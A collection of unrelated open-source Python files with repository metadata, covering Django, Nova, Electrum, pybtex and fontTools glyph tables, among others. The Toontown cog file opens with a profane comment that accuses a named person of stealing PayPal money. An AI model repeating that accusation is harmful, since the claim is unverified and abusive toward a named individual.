def _notify_subscribers(notification):
SUBSCRIBERS[notification['event_type']].set()
|
rajalokan/nova
|
nova/tests/unit/fake_notifier.py
|
Python
|
apache-2.0
| 4,395
|
#!/usr/bin/env python
from pyfi.calendar.calendar.object import Calendar
__all__ = ['Calendar']
|
rlinguri/pyfi
|
pyfi/calendar/calendar/__init__.py
|
Python
|
mit
| 98
|
from django import forms
from connect.accounts.models import Role, Skill
class FilterMemberForm(forms.Form):
"""
Form for searching for members by their skills and roles.
"""
skills = forms.ModelMultipleChoiceField(
queryset=Skill.objects.all(),
widget=forms.CheckboxSelectMultiple(),
required=False)
roles = forms.ModelMultipleChoiceField(
queryset=Role.objects.all(),
widget=forms.CheckboxSelectMultiple(),
required=False)
|
nlhkabu/connect
|
connect/discover/forms.py
|
Python
|
bsd-3-clause
| 497
|
# Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.coghq.CashbotMintGearRoom_Battle01_Cogs
from panda3d.core import Point3
from SpecImports import *
from toontown.toonbase import ToontownGlobals
CogParent = 10000
BattleCellId = 0
BattleCells = {BattleCellId: {'parentEntId': CogParent,
'pos': Point3(0, 0, 0)}}
CogData = [{'parentEntId': CogParent,
'boss': 1,
'level': ToontownGlobals.CashbotMintBossLevel,
'battleCell': BattleCellId,
'pos': Point3(-6, 0, 0),
'h': 180,
'behavior': 'stand',
'path': None,
'skeleton': 1},
{'parentEntId': CogParent,
'boss': 0,
'level': ToontownGlobals.CashbotMintCogLevel + 1,
'battleCell': BattleCellId,
'pos': Point3(-2, 0, 0),
'h': 180,
'behavior': 'stand',
'path': None,
'skeleton': 0},
{'parentEntId': CogParent,
'boss': 0,
'level': ToontownGlobals.CashbotMintCogLevel + 1,
'battleCell': BattleCellId,
'pos': Point3(2, 0, 0),
'h': 180,
'behavior': 'stand',
'path': None,
'skeleton': 0},
{'parentEntId': CogParent,
'boss': 0,
'level': ToontownGlobals.CashbotMintCogLevel + 1,
'battleCell': BattleCellId,
'pos': Point3(6, 0, 0),
'h': 180,
'behavior': 'stand',
'path': None,
'skeleton': 0}]
ReserveCogData = []
|
DedMemez/ODS-August-2017
|
coghq/CashbotMintGearRoom_Battle01_Cogs.py
|
Python
|
apache-2.0
| 1,288
|
# Copyright (c) 2003-2005 Jimmy Retzlaff, 2008 Konstantin Yegupov
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Unix version uses unrar command line executable
import subprocess
import gc
import os, os.path
import time, re
from rar_exceptions import *
class UnpackerNotInstalled(Exception): pass
rar_executable_cached = None
rar_executable_version = None
def call_unrar(params):
"Calls rar/unrar command line executable, returns stdout pipe"
global rar_executable_cached
if rar_executable_cached is None:
for command in ('unrar', 'rar'):
try:
subprocess.Popen([command], stdout=subprocess.PIPE)
rar_executable_cached = command
break
except OSError:
pass
if rar_executable_cached is None:
raise UnpackerNotInstalled("No suitable RAR unpacker installed")
assert type(params) == list, "params must be list"
args = [rar_executable_cached] + params
try:
gc.disable() # See http://bugs.python.org/issue1336
return subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
finally:
gc.enable()
class RarFileImplementation(object):
def init(self, password=None):
global rar_executable_version
self.password = password
proc = self.call('v', [])
stdoutdata, stderrdata = proc.communicate()
# Use unrar return code if available
self._check_returncode(proc.returncode)
for line in stderrdata.splitlines():
if line.strip().startswith("Cannot open"):
raise FileOpenError
if line.find("CRC failed")>=0:
raise IncorrectRARPassword
accum = []
source = iter(stdoutdata.splitlines())
line = ''
while (line.find('RAR ') == -1):
line = source.next()
signature = line
# The code below is mighty flaky
# and will probably crash on localized versions of RAR
# but I see no safe way to rewrite it using a CLI tool
if signature.find("RAR 4") > -1:
rar_executable_version = 4
while not (line.startswith('Comment:') or line.startswith('Pathname/Comment')):
if line.strip().endswith('is not RAR archive'):
raise InvalidRARArchive
line = source.next()
while not line.startswith('Pathname/Comment'):
accum.append(line.rstrip('\n'))
line = source.next()
if len(accum):
accum[0] = accum[0][9:] # strip out "Comment:" part
self.comment = '\n'.join(accum[:-1])
else:
self.comment = None
elif signature.find("RAR 5") > -1:
rar_executable_version = 5
line = source.next()
while not line.startswith('Archive:'):
if line.strip().endswith('is not RAR archive'):
raise InvalidRARArchive
accum.append(line.rstrip('\n'))
line = source.next()
if len(accum):
self.comment = '\n'.join(accum[:-1]).strip()
else:
self.comment = None
else:
raise UnpackerNotInstalled("Unsupported RAR version, expected 4.x or 5.x, found: "
+ signature.split(" ")[1])
def escaped_password(self):
return '-' if self.password == None else self.password
def call(self, cmd, options=[], files=[]):
options2 = options + ['p'+self.escaped_password()]
soptions = ['-'+x for x in options2]
return call_unrar([cmd]+soptions+['--',self.archiveName]+files)
def infoiter(self):
command = "v" if rar_executable_version == 4 else "l"
proc = self.call(command, ['c-'])
stdoutdata, stderrdata = proc.communicate()
# Use unrar return code if available
self._check_returncode(proc.returncode)
for line in stderrdata.splitlines():
if line.strip().startswith("Cannot open"):
raise FileOpenError
accum = []
source = iter(stdoutdata.splitlines())
line = ''
while not line.startswith('-----------'):
if line.strip().endswith('is not RAR archive'):
raise InvalidRARArchive
if line.startswith("CRC failed") or line.startswith("Checksum error") or line.startswith("checksum error"):
raise IncorrectRARPassword
line = source.next()
line = source.next()
i = 0
re_spaces = re.compile(r"\s+")
if rar_executable_version == 4:
while not line.startswith('-----------'):
accum.append(line)
if len(accum)==2:
data = {}
data['index'] = i
# asterisks mark password-encrypted files
data['filename'] = accum[0].strip().lstrip("*") # asterisks marks password-encrypted files
fields = re_spaces.split(accum[1].strip())
data['size'] = int(fields[0])
attr = fields[5]
data['isdir'] = 'd' in attr.lower()
data['datetime'] = time.strptime(fields[3]+" "+fields[4], '%d-%m-%y %H:%M')
data['comment'] = None
data['volume'] = None
yield data
accum = []
i += 1
line = source.next()
elif rar_executable_version == 5:
while not line.startswith('-----------'):
fields = line.strip().lstrip("*").split()
data = {}
data['index'] = i
data['filename'] = " ".join(fields[4:])
data['size'] = int(fields[1])
attr = fields[0]
data['isdir'] = 'd' in attr.lower()
data['datetime'] = time.strptime(fields[2]+" "+fields[3], '%d-%m-%y %H:%M')
data['comment'] = None
data['volume'] = None
yield data
i += 1
line = source.next()
def read_files(self, checker):
res = []
for info in self.infoiter():
checkres = checker(info)
if checkres==True and not info.isdir:
pipe = self.call('p', ['inul'], [info.filename]).stdout
res.append((info, pipe.read()))
return res
def extract(self, checker, path, withSubpath, overwrite):
res = []
command = 'x'
if not withSubpath:
command = 'e'
options = []
if overwrite:
options.append('o+')
else:
options.append('o-')
if not path.endswith(os.sep):
path += os.sep
names = []
for info in self.infoiter():
checkres = checker(info)
if type(checkres) in [str, unicode]:
raise NotImplementedError("Condition callbacks returning strings are deprecated and only supported in Windows")
if checkres==True and not info.isdir:
names.append(info.filename)
res.append(info)
names.append(path)
proc = self.call(command, options, names)
stdoutdata, stderrdata = proc.communicate()
# Use unrar return code if available
self._check_returncode(proc.returncode)
if stderrdata.find("CRC failed")>=0 or stderrdata.find("Checksum error")>=0 or stderrdata.find("checksum error")>=0:
raise CRCRARError
if stderrdata.find("No files to extract")>=0:
raise NoFileToExtract
if stderrdata.find("Bad archive")>=0:
raise FatalRARError
return res
def _check_returncode(self, returncode):
# RAR exit code from unrarsrc-5.2.1.tar.gz/errhnd.hpp
RARX_SUCCESS = 0
RARX_WARNING = 1
RARX_FATAL = 2
RARX_CRC = 3
RARX_LOCK = 4
RARX_WRITE = 5
RARX_OPEN = 6
RARX_USERERROR = 7
RARX_MEMORY = 8
RARX_CREATE = 9
RARX_NOFILES = 10
RARX_BADPWD = 11
RARX_USERBREAK = 255
if returncode != RARX_SUCCESS:
if returncode == RARX_FATAL:
raise FatalRARError
elif returncode == RARX_CRC:
raise CRCRARError
elif returncode == RARX_BADPWD:
raise IncorrectRARPassword
elif returncode == RARX_NOFILES:
raise NoFileToExtract
else:
raise GenericRARError
def destruct(self):
pass
def get_volume(self):
command = "v" if rar_executable_version == 4 else "l"
stdoutdata, stderrdata = self.call(command, ['c-']).communicate()
for line in stderrdata.splitlines():
if line.strip().startswith("Cannot open"):
raise FileOpenError
source = iter(stdoutdata.splitlines())
line = ''
while not line.startswith('-----------'):
if line.strip().endswith('is not RAR archive'):
raise InvalidRARArchive
if line.startswith("CRC failed") or line.startswith("Checksum error"):
raise IncorrectRARPassword
line = source.next()
line = source.next()
if rar_executable_version == 4:
while not line.startswith('-----------'):
line = source.next()
line = source.next()
items = line.strip().split()
if len(items)>4 and items[4]=="volume":
return int(items[5]) - 1
else:
return None
elif rar_executable_version == 5:
while not line.startswith('-----------'):
line = source.next()
line = source.next()
items = line.strip().split()
if items[1]=="volume":
return int(items[2]) - 1
else:
return None
|
keen99/SickRage
|
lib/unrar2/unix.py
|
Python
|
gpl-3.0
| 11,433
|
"""Localizations for meas_date extraction."""
# Authors: Eric Larson <larson.eric.d@gmail.com>
#
# License: BSD-3-Clause
# This file was generated on 2021/01/31 on an Ubuntu system.
# When getting "unsupported locale setting" on Ubuntu (e.g., with localepurge),
# use "sudo locale-gen de_DE" etc. then "sudo update-locale".
"""
import datetime
import locale
print('_localized_abbr = {')
for loc in ('en_US.utf8', 'de_DE', 'fr_FR', 'it_IT'):
print(f' {repr(loc)}: {{')
print(' "month": {', end='')
month_abbr = set()
for month in range(1, 13): # Month as locale’s abbreviated name
locale.setlocale(locale.LC_TIME, "en_US.utf8")
dt = datetime.datetime(year=2000, month=month, day=1)
val = dt.strftime("%b").lower()
locale.setlocale(locale.LC_TIME, loc)
key = dt.strftime("%b").lower()
month_abbr.add(key)
print(f'{repr(key)}: {repr(val)}, ', end='')
print('}, # noqa')
print(' "weekday": {', end='')
weekday_abbr = set()
for day in range(1, 8): # Weekday as locale’s abbreviated name.
locale.setlocale(locale.LC_TIME, "en_US.utf8")
dt = datetime.datetime(year=2000, month=1, day=day)
val = dt.strftime("%a").lower()
locale.setlocale(locale.LC_TIME, loc)
key = dt.strftime("%a").lower()
assert key not in weekday_abbr, key
weekday_abbr.add(key)
print(f'{repr(key)}: {repr(val)}, ', end='')
print('}, # noqa')
print(' },')
print('}\n')
"""
_localized_abbr = {
'en_US.utf8': {
"month": {'jan': 'jan', 'feb': 'feb', 'mar': 'mar', 'apr': 'apr', 'may': 'may', 'jun': 'jun', 'jul': 'jul', 'aug': 'aug', 'sep': 'sep', 'oct': 'oct', 'nov': 'nov', 'dec': 'dec', }, # noqa
"weekday": {'sat': 'sat', 'sun': 'sun', 'mon': 'mon', 'tue': 'tue', 'wed': 'wed', 'thu': 'thu', 'fri': 'fri', }, # noqa
},
'de_DE': {
"month": {'jan': 'jan', 'feb': 'feb', 'mär': 'mar', 'apr': 'apr', 'mai': 'may', 'jun': 'jun', 'jul': 'jul', 'aug': 'aug', 'sep': 'sep', 'okt': 'oct', 'nov': 'nov', 'dez': 'dec', }, # noqa
"weekday": {'sa': 'sat', 'so': 'sun', 'mo': 'mon', 'di': 'tue', 'mi': 'wed', 'do': 'thu', 'fr': 'fri', }, # noqa
},
'fr_FR': {
"month": {'janv.': 'jan', 'févr.': 'feb', 'mars': 'mar', 'avril': 'apr', 'mai': 'may', 'juin': 'jun', 'juil.': 'jul', 'août': 'aug', 'sept.': 'sep', 'oct.': 'oct', 'nov.': 'nov', 'déc.': 'dec', }, # noqa
"weekday": {'sam.': 'sat', 'dim.': 'sun', 'lun.': 'mon', 'mar.': 'tue', 'mer.': 'wed', 'jeu.': 'thu', 'ven.': 'fri', }, # noqa
},
'it_IT': {
"month": {'gen': 'jan', 'feb': 'feb', 'mar': 'mar', 'apr': 'apr', 'mag': 'may', 'giu': 'jun', 'lug': 'jul', 'ago': 'aug', 'set': 'sep', 'ott': 'oct', 'nov': 'nov', 'dic': 'dec', }, # noqa
"weekday": {'sab': 'sat', 'dom': 'sun', 'lun': 'mon', 'mar': 'tue', 'mer': 'wed', 'gio': 'thu', 'ven': 'fri', }, # noqa
},
}
|
wmvanvliet/mne-python
|
mne/io/nirx/_localized_abbr.py
|
Python
|
bsd-3-clause
| 2,966
|
# Copyright (c) 2008, 2009, 2010, 2011 Andrey Golovizin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from xml.sax.saxutils import escape
from pybtex.backends import BaseBackend
import pybtex.io
file_extension = 'html'
PROLOGUE = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><meta name="generator" content="Pybtex">
<meta http-equiv="Content-Type" content="text/html; charset=%s">
<title>Bibliography</title>
</head>
<body>
<dl>
"""
class Backend(BaseBackend):
name = 'html'
suffixes = '.html',
symbols = {
'ndash': u'–',
'newblock': u'\n',
'nbsp': u' '
}
tags = {
'emph': u'em',
}
def format_text(self, text):
return escape(text)
def format_tag(self, tag_name, text):
tag = self.tags[tag_name]
return ur'<%s>%s</%s>' % (tag, text, tag)
def write_prologue(self, maxlen):
encoding = self.encoding or pybtex.io.get_default_encoding()
self.output(PROLOGUE % encoding)
def write_epilogue(self):
self.output(u'</dl></body></html>\n')
def write_entry(self, key, label, text):
self.output(u'<dt>%s</dt>\n' % label)
self.output(u'<dd>%s</dd>\n' % text)
|
rybesh/pybtex
|
pybtex/backends/html.py
|
Python
|
mit
| 2,255
|
"""!
@brief Examples of usage and demonstration of abilities of BSAS algorithm in cluster analysis.
@authors Andrei Novikov (pyclustering@yandex.ru)
@date 2014-2020
@copyright BSD-3-Clause
"""
from pyclustering.cluster import cluster_visualizer;
from pyclustering.cluster.bsas import bsas, bsas_visualizer;
from pyclustering.samples.definitions import SIMPLE_SAMPLES;
from pyclustering.utils import read_sample;
from pyclustering.utils.metric import distance_metric, type_metric;
def template_clustering(path, amount, threshold, **kwargs):
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE));
ccore = kwargs.get('ccore', False);
draw = kwargs.get('draw', True);
sample = read_sample(path);
print("Sample: ", path);
bsas_instance = bsas(sample, amount, threshold, ccore=ccore, metric=metric);
bsas_instance.process();
clusters = bsas_instance.get_clusters();
representatives = bsas_instance.get_representatives();
if draw is True:
bsas_visualizer.show_clusters(sample, clusters, representatives);
def cluster_sample1():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0);
def cluster_sample2():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1.0);
def cluster_sample3():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 1.0);
def cluster_sample4():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5, 1.0);
def cluster_sample5():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 4, 1.0);
def cluster_sample6():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, 2, 1.0);
def cluster_elongate():
template_clustering(SIMPLE_SAMPLES.SAMPLE_ELONGATE, 2, 1.0);
cluster_sample1();
cluster_sample2();
cluster_sample3();
cluster_sample4();
cluster_sample5();
cluster_sample6();
cluster_elongate();
|
annoviko/pyclustering
|
pyclustering/cluster/examples/bsas_examples.py
|
Python
|
gpl-3.0
| 1,836
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-11 18:40
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ipam', '0001_initial'),
('dcim', '0005_auto_20160706_1722'),
]
operations = [
migrations.AddField(
model_name='device',
name='primary_ip4',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='primary_ip4_for', to='ipam.IPAddress', verbose_name=b'Primary IPv4'),
),
migrations.AddField(
model_name='device',
name='primary_ip6',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='primary_ip6_for', to='ipam.IPAddress', verbose_name=b'Primary IPv6'),
),
]
|
digitalocean/netbox
|
netbox/dcim/migrations/0006_add_device_primary_ip4_ip6.py
|
Python
|
apache-2.0
| 914
|
# coding: utf-8
from __future__ import absolute_import
import hashlib
from flask.ext.babel import lazy_gettext as _
from google.appengine.ext import ndb
from api import fields
import model
import util
import config
class User(model.Base):
name = ndb.StringProperty(required=True, verbose_name=_('Name'))
username = ndb.StringProperty(required=True, verbose_name=_('Username'))
email = ndb.StringProperty(default='', verbose_name=_('Email'))
locale = ndb.StringProperty(default='', verbose_name=_('Language'))
auth_ids = ndb.StringProperty(repeated=True)
active = ndb.BooleanProperty(default=True, verbose_name=_('Active'))
admin = ndb.BooleanProperty(default=False, verbose_name=_('Admin'))
permissions = ndb.StringProperty(repeated=True, verbose_name=_('Permissions'))
verified = ndb.BooleanProperty(default=False, verbose_name=_('Verified'))
token = ndb.StringProperty(default='')
password_hash = ndb.StringProperty(default='')
def has_permission(self, perm):
return self.admin or perm in self.permissions
def avatar_url_size(self, size=None):
return '//gravatar.com/avatar/%(hash)s?d=identicon&r=x%(size)s' % {
'hash': hashlib.md5(
(self.email or self.username).encode('utf-8')).hexdigest(),
'size': '&s=%d' % size if size > 0 else '',
}
avatar_url = property(avatar_url_size)
@classmethod
def get_dbs(
cls, admin=None, active=None, verified=None, permissions=None, **kwargs
):
return super(User, cls).get_dbs(
admin=admin or util.param('admin', bool),
active=active or util.param('active', bool),
verified=verified or util.param('verified', bool),
permissions=permissions or util.param('permissions', list),
**kwargs
)
@classmethod
def is_username_available(cls, username, self_key=None):
if self_key is None:
return cls.get_by('username', username) is None
user_keys, _ = util.get_keys(cls.query(), username=username, limit=2)
return not user_keys or self_key in user_keys and not user_keys[1:]
@classmethod
def is_email_available(cls, email, self_key=None):
if not config.CONFIG_DB.check_unique_email:
return True
user_keys, _ = util.get_keys(
cls.query(), email=email, verified=True, limit=2,
)
return not user_keys or self_key in user_keys and not user_keys[1:]
FIELDS = {
'active': fields.Boolean,
'admin': fields.Boolean,
'auth_ids': fields.List(fields.String),
'avatar_url': fields.String,
'email': fields.String,
'locale': fields.String,
'name': fields.String,
'permissions': fields.List(fields.String),
'username': fields.String,
'verified': fields.Boolean,
}
FIELDS.update(model.Base.FIELDS)
|
mdxs/gae-init-babel
|
main/model/user.py
|
Python
|
mit
| 2,779
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack.compute import extensions
from nova import flags
from nova.log import logging
from nova.tests.integrated import integrated_helpers
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
class ExtensionsTest(integrated_helpers._IntegratedTestBase):
def _get_flags(self):
f = super(ExtensionsTest, self)._get_flags()
f['osapi_compute_extension'] = FLAGS.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.tests.api.openstack.compute.extensions.'
'foxinsocks.Foxinsocks')
return f
def test_get_foxnsocks(self):
"""Simple check that fox-n-socks works."""
response = self.api.api_request('/foxnsocks')
foxnsocks = response.read()
LOG.debug("foxnsocks: %s" % foxnsocks)
self.assertEqual('Try to say this Mr. Knox, sir...', foxnsocks)
|
sileht/deb-openstack-nova
|
nova/tests/integrated/test_extensions.py
|
Python
|
apache-2.0
| 1,560
|
import sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from matplotlib.ticker import FuncFormatter
cdict = {'red': [(0.0, 0.0, 0.0),
(0.33, 0.0, 0.0),
(0.66, 1.0, 1.0),
(1.0, 1.0, 1.0)],
'blue': [(0.0, 0.0, 0.0),
(0.33, 1.0, 1.0),
(0.66, 0.0, 0.0),
(1.0, 0.0, 0.0)],
'green': [(0.0, 0.0, 0.0),
(0.33, 0.0, 0.0),
(0.66, 0.0, 0.0),
(1.0, 1.0, 1.0)]}
my_cmap = matplotlib.colors.LinearSegmentedColormap('my_colormap', cdict, 256)
def scale(x, pos):
'The two args are the value and tick position'
return '%1.1f' % (x / 100.0)
def scale2(x, pos):
'The two args are the value and tick position'
return '%1.1f' % (x / 100.0)
size = int(sys.argv[2])
x, y, z = np.loadtxt(sys.argv[1]).T
data = np.zeros((size, size))
m = 0
x_m = 0
y_m = 0
for i in range(0, len(z)):
data[round(x[i] * size), round(y[i] * size)] = z[i]
if z[i] > m:
x_m = round(x[i] * size)
y_m = round(y[i] * size)
m = z[i]
data = np.ma.masked_where(data == 0, data)
print "best:"+str(max(z))
def load_points(fname):
p_z, p_y, p_x = np.loadtxt(fname).T
p_x *= size
p_y *= size
p_p_x = []
p_p_y = []
np_p_x = []
np_p_y = []
for i in range(0, len(p_x)):
if p_z[i] == 1.0:
p_p_x += [p_x[i]]
p_p_y += [p_y[i]]
else:
np_p_x += [p_x[i]]
np_p_y += [p_y[i]]
return p_p_x, p_p_y, np_p_x, np_p_y
fig = plt.figure()
im = plt.imshow(data.T, origin='lower', cmap=my_cmap)
im.set_interpolation('nearest')
fig.subplots_adjust(top=0.98)
cb = plt.colorbar()
for t in cb.ax.get_xticklabels():
t.set_fontsize(130)
ax = fig.add_subplot(111)
ax.yaxis.set_major_formatter(FuncFormatter(scale))
ax.xaxis.set_major_formatter(FuncFormatter(scale2))
plt.savefig('heatmap.pdf')
|
Evolving-AI-Lab/innovation-engine
|
sferes/modules/map_elite/plot_map.py
|
Python
|
mit
| 1,994
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-12 08:58
from __future__ import unicode_literals
from django.conf import settings
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
('weblog', '0005_auto_20160112_0956'),
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
'verbose_name_plural': 'users',
'verbose_name': 'user',
},
bases=('users.user',),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Editor',
fields=[
('author_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='weblog.Author')),
],
options={
'abstract': False,
'verbose_name_plural': 'users',
'verbose_name': 'user',
},
bases=('weblog.author',),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
|
drxos/kuiqblog
|
weblog/migrations/0006_author_editor.py
|
Python
|
bsd-3-clause
| 1,641
|
import unittest
import threading
import tempfile
import shutil
import electrum_mona
import electrum_mona.logging
from electrum_mona import constants
# Set this locally to make the test suite run faster.
# If set, unit tests that would normally test functions with multiple implementations,
# will only be run once, using the fastest implementation.
# e.g. libsecp256k1 vs python-ecdsa. pycryptodomex vs pyaes.
FAST_TESTS = False
electrum_mona.logging._configure_stderr_logging()
# some unit tests are modifying globals...
class SequentialTestCase(unittest.TestCase):
test_lock = threading.Lock()
def setUp(self):
super().setUp()
self.test_lock.acquire()
def tearDown(self):
super().tearDown()
self.test_lock.release()
class ElectrumTestCase(SequentialTestCase):
"""Base class for our unit tests."""
def setUp(self):
super().setUp()
self.electrum_path = tempfile.mkdtemp()
def tearDown(self):
super().tearDown()
shutil.rmtree(self.electrum_path)
class TestCaseForTestnet(ElectrumTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
constants.set_testnet()
@classmethod
def tearDownClass(cls):
super().tearDownClass()
constants.set_mainnet()
|
wakiyamap/electrum-mona
|
electrum_mona/tests/__init__.py
|
Python
|
mit
| 1,307
|
# -*- coding: utf-8 -*-
# The tables below are taken from
# https://github.com/adobe-type-tools/agl-aglfn/raw/4036a9ca80a62f64f9de4f7321a9a045ad0ecfd6/glyphlist.txt
# and
# https://github.com/adobe-type-tools/agl-aglfn/raw/4036a9ca80a62f64f9de4f7321a9a045ad0ecfd6/aglfn.txt
"""
Interface to the Adobe Glyph List
This module exists to convert glyph names from the Adobe Glyph List
to their Unicode equivalents. Example usage:
>>> from fontTools.agl import toUnicode
>>> toUnicode("nahiragana")
'な'
It also contains two dictionaries, ``UV2AGL`` and ``AGL2UV``, which map from
Unicode codepoints to AGL names and vice versa:
>>> import fontTools
>>> fontTools.agl.UV2AGL[ord("?")]
'question'
>>> fontTools.agl.AGL2UV["wcircumflex"]
373
This is used by fontTools when it has to construct glyph names for a font which
doesn't include any (e.g. format 3.0 post tables).
"""
from fontTools.misc.py23 import tostr
import re
_aglText = """\
# -----------------------------------------------------------
# Copyright 2002-2019 Adobe (http://www.adobe.com/).
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the
# following conditions are met:
#
# Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# Neither the name of Adobe nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# -----------------------------------------------------------
# Name: Adobe Glyph List
# Table version: 2.0
# Date: September 20, 2002
# URL: https://github.com/adobe-type-tools/agl-aglfn
#
# Format: two semicolon-delimited fields:
# (1) glyph name--upper/lowercase letters and digits
# (2) Unicode scalar value--four uppercase hexadecimal digits
#
A;0041
AE;00C6
AEacute;01FC
AEmacron;01E2
AEsmall;F7E6
Aacute;00C1
Aacutesmall;F7E1
Abreve;0102
Abreveacute;1EAE
Abrevecyrillic;04D0
Abrevedotbelow;1EB6
Abrevegrave;1EB0
Abrevehookabove;1EB2
Abrevetilde;1EB4
Acaron;01CD
Acircle;24B6
Acircumflex;00C2
Acircumflexacute;1EA4
Acircumflexdotbelow;1EAC
Acircumflexgrave;1EA6
Acircumflexhookabove;1EA8
Acircumflexsmall;F7E2
Acircumflextilde;1EAA
Acute;F6C9
Acutesmall;F7B4
Acyrillic;0410
Adblgrave;0200
Adieresis;00C4
Adieresiscyrillic;04D2
Adieresismacron;01DE
Adieresissmall;F7E4
Adotbelow;1EA0
Adotmacron;01E0
Agrave;00C0
Agravesmall;F7E0
Ahookabove;1EA2
Aiecyrillic;04D4
Ainvertedbreve;0202
Alpha;0391
Alphatonos;0386
Amacron;0100
Amonospace;FF21
Aogonek;0104
Aring;00C5
Aringacute;01FA
Aringbelow;1E00
Aringsmall;F7E5
Asmall;F761
Atilde;00C3
Atildesmall;F7E3
Aybarmenian;0531
B;0042
Bcircle;24B7
Bdotaccent;1E02
Bdotbelow;1E04
Becyrillic;0411
Benarmenian;0532
Beta;0392
Bhook;0181
Blinebelow;1E06
Bmonospace;FF22
Brevesmall;F6F4
